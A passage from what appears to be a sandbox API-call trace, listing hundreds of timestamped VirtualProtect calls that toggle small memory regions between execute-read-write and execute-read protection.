lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.698] VirtualProtect (in: lpAddress=0x24e11f0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.698] VirtualProtect (in: lpAddress=0x24e11f8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.698] VirtualProtect (in: lpAddress=0x24e11f8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.728] VirtualProtect (in: lpAddress=0x24e1200, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.728] VirtualProtect (in: lpAddress=0x24e1200, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.728] VirtualProtect (in: lpAddress=0x24e120c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.728] VirtualProtect (in: lpAddress=0x24e120c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.728] VirtualProtect (in: lpAddress=0x24e1214, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.728] VirtualProtect (in: lpAddress=0x24e1214, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.729] VirtualProtect (in: lpAddress=0x24e1218, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.729] VirtualProtect (in: lpAddress=0x24e1218, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.729] VirtualProtect (in: lpAddress=0x24e1220, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.729] VirtualProtect (in: lpAddress=0x24e1220, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.729] VirtualProtect (in: lpAddress=0x24e122c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.729] VirtualProtect (in: lpAddress=0x24e122c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.730] VirtualProtect (in: lpAddress=0x24e1240, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.730] VirtualProtect (in: lpAddress=0x24e1240, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.730] VirtualProtect (in: lpAddress=0x24e1244, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.730] VirtualProtect (in: lpAddress=0x24e1244, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.730] VirtualProtect (in: lpAddress=0x24e1248, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.730] VirtualProtect (in: lpAddress=0x24e1248, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.730] VirtualProtect (in: lpAddress=0x24e1258, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.731] VirtualProtect (in: lpAddress=0x24e1258, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.731] VirtualProtect (in: lpAddress=0x24e1260, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.731] VirtualProtect (in: lpAddress=0x24e1260, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.731] VirtualProtect (in: lpAddress=0x24e1274, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.731] VirtualProtect (in: lpAddress=0x24e1274, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.731] VirtualProtect (in: lpAddress=0x24e139c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.731] VirtualProtect (in: lpAddress=0x24e139c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.732] VirtualProtect (in: lpAddress=0x24e13a4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.732] VirtualProtect (in: lpAddress=0x24e13a4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.732] VirtualProtect (in: lpAddress=0x24e13ac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.732] VirtualProtect (in: lpAddress=0x24e13ac, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.732] VirtualProtect (in: lpAddress=0x24e13b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.732] VirtualProtect (in: lpAddress=0x24e13b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.732] VirtualProtect (in: lpAddress=0x24e13b4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.733] VirtualProtect (in: lpAddress=0x24e13b4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.733] VirtualProtect (in: lpAddress=0x24e13bc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.733] VirtualProtect (in: lpAddress=0x24e13bc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.733] VirtualProtect (in: lpAddress=0x24e13c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.733] VirtualProtect (in: lpAddress=0x24e13c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.733] VirtualProtect (in: lpAddress=0x24e13c4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.733] VirtualProtect (in: lpAddress=0x24e13c4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.734] VirtualProtect (in: lpAddress=0x24e13d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.734] VirtualProtect (in: lpAddress=0x24e13d8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.734] VirtualProtect (in: lpAddress=0x24e13e4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.734] VirtualProtect (in: lpAddress=0x24e13e4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.734] VirtualProtect (in: lpAddress=0x24e13f0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.734] VirtualProtect (in: lpAddress=0x24e13f0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.734] VirtualProtect (in: lpAddress=0x24e13fc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.735] VirtualProtect (in: lpAddress=0x24e13fc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.735] VirtualProtect (in: lpAddress=0x24e1408, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.735] VirtualProtect (in: lpAddress=0x24e1408, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.735] VirtualProtect (in: lpAddress=0x24e1414, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.735] VirtualProtect (in: lpAddress=0x24e1414, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.735] VirtualProtect (in: lpAddress=0x24e142c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.735] VirtualProtect (in: lpAddress=0x24e142c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.736] VirtualProtect (in: lpAddress=0x24e1440, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.736] VirtualProtect (in: lpAddress=0x24e1440, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.736] VirtualProtect (in: lpAddress=0x24e1448, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.736] VirtualProtect (in: lpAddress=0x24e1448, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.736] VirtualProtect (in: lpAddress=0x24e1450, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.736] VirtualProtect (in: lpAddress=0x24e1450, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.736] VirtualProtect (in: lpAddress=0x24e1458, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.737] VirtualProtect (in: lpAddress=0x24e1458, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.737] VirtualProtect (in: lpAddress=0x24e1460, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.737] VirtualProtect (in: lpAddress=0x24e1460, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.737] VirtualProtect (in: lpAddress=0x24e1468, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.737] VirtualProtect (in: lpAddress=0x24e1468, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.737] VirtualProtect (in: lpAddress=0x24e1470, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.737] VirtualProtect (in: lpAddress=0x24e1470, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.738] VirtualProtect (in: lpAddress=0x24e1478, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.738] VirtualProtect (in: lpAddress=0x24e1478, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.738] VirtualProtect (in: lpAddress=0x24e1480, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.738] VirtualProtect (in: lpAddress=0x24e1480, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.738] VirtualProtect (in: lpAddress=0x24e1488, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.738] VirtualProtect (in: lpAddress=0x24e1488, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.738] VirtualProtect (in: lpAddress=0x24e1490, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.739] VirtualProtect (in: lpAddress=0x24e1490, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.739] VirtualProtect (in: lpAddress=0x24e1498, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.739] VirtualProtect (in: lpAddress=0x24e1498, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.739] VirtualProtect (in: lpAddress=0x24e14a0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.739] VirtualProtect (in: lpAddress=0x24e14a0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.739] VirtualProtect (in: lpAddress=0x24e14a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.739] VirtualProtect (in: lpAddress=0x24e14a8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.740] VirtualProtect (in: lpAddress=0x24e14b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.740] VirtualProtect (in: lpAddress=0x24e14b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.740] VirtualProtect (in: lpAddress=0x24e14b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.740] VirtualProtect (in: lpAddress=0x24e14b8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.740] VirtualProtect (in: lpAddress=0x24e14c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.740] VirtualProtect (in: lpAddress=0x24e14c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.740] VirtualProtect (in: lpAddress=0x24e14c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.741] VirtualProtect (in: lpAddress=0x24e14c8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.741] VirtualProtect (in: lpAddress=0x24e14d0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.741] VirtualProtect (in: lpAddress=0x24e14d0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.741] VirtualProtect (in: lpAddress=0x24e14d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.741] VirtualProtect (in: lpAddress=0x24e14d8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.741] VirtualProtect (in: lpAddress=0x24e14e0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.741] VirtualProtect (in: lpAddress=0x24e14e0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.742] VirtualProtect (in: lpAddress=0x24e14e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.742] VirtualProtect (in: lpAddress=0x24e14e8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.742] VirtualProtect (in: lpAddress=0x24e14f0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.742] VirtualProtect (in: lpAddress=0x24e14f0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.742] VirtualProtect (in: lpAddress=0x24e14f8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.742] VirtualProtect (in: lpAddress=0x24e14f8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.742] VirtualProtect (in: lpAddress=0x24e1500, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.743] VirtualProtect (in: lpAddress=0x24e1500, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.743] VirtualProtect (in: lpAddress=0x24e1508, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.743] VirtualProtect (in: lpAddress=0x24e1508, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.743] VirtualProtect (in: lpAddress=0x24e1510, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.743] VirtualProtect (in: lpAddress=0x24e1510, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.743] VirtualProtect (in: lpAddress=0x24e1518, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.743] VirtualProtect (in: lpAddress=0x24e1518, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.744] VirtualProtect (in: lpAddress=0x24e1520, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.744] VirtualProtect (in: lpAddress=0x24e1520, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.744] VirtualProtect (in: lpAddress=0x24e1528, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.744] VirtualProtect (in: lpAddress=0x24e1528, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.744] VirtualProtect (in: lpAddress=0x24e1530, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.744] VirtualProtect (in: lpAddress=0x24e1530, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.744] VirtualProtect (in: lpAddress=0x24e1538, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.745] VirtualProtect (in: lpAddress=0x24e1538, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.745] VirtualProtect (in: lpAddress=0x24e1540, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.745] VirtualProtect (in: lpAddress=0x24e1540, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.745] VirtualProtect (in: lpAddress=0x24e1548, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.745] VirtualProtect (in: lpAddress=0x24e1548, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.746] VirtualProtect (in: lpAddress=0x24e1550, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.746] VirtualProtect (in: lpAddress=0x24e1550, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.746] VirtualProtect (in: lpAddress=0x24e1558, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.746] VirtualProtect (in: lpAddress=0x24e1558, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.746] VirtualProtect (in: lpAddress=0x24e1560, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.746] VirtualProtect (in: lpAddress=0x24e1560, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.747] VirtualProtect (in: lpAddress=0x24e1568, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.747] VirtualProtect (in: lpAddress=0x24e1568, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.747] VirtualProtect (in: lpAddress=0x24e1570, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.747] VirtualProtect (in: lpAddress=0x24e1570, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.747] VirtualProtect (in: lpAddress=0x24e1578, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.747] VirtualProtect (in: lpAddress=0x24e1578, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.747] VirtualProtect (in: lpAddress=0x24e1580, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.748] VirtualProtect (in: lpAddress=0x24e1580, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.748] VirtualProtect (in: lpAddress=0x24e1588, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.748] VirtualProtect (in: lpAddress=0x24e1588, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.748] VirtualProtect (in: lpAddress=0x24e1590, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.748] VirtualProtect (in: lpAddress=0x24e1590, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.748] VirtualProtect (in: lpAddress=0x24e1598, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.748] VirtualProtect (in: lpAddress=0x24e1598, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.749] VirtualProtect (in: lpAddress=0x24e15a0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.749] VirtualProtect (in: lpAddress=0x24e15a0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.749] VirtualProtect (in: lpAddress=0x24e15a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.749] VirtualProtect (in: lpAddress=0x24e15a8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.749] VirtualProtect (in: lpAddress=0x24e15b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.749] VirtualProtect (in: lpAddress=0x24e15b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.749] VirtualProtect (in: lpAddress=0x24e15b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.750] VirtualProtect (in: lpAddress=0x24e15b8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.750] VirtualProtect (in: lpAddress=0x24e15c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.750] VirtualProtect (in: lpAddress=0x24e15c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.750] VirtualProtect (in: lpAddress=0x24e15c8, 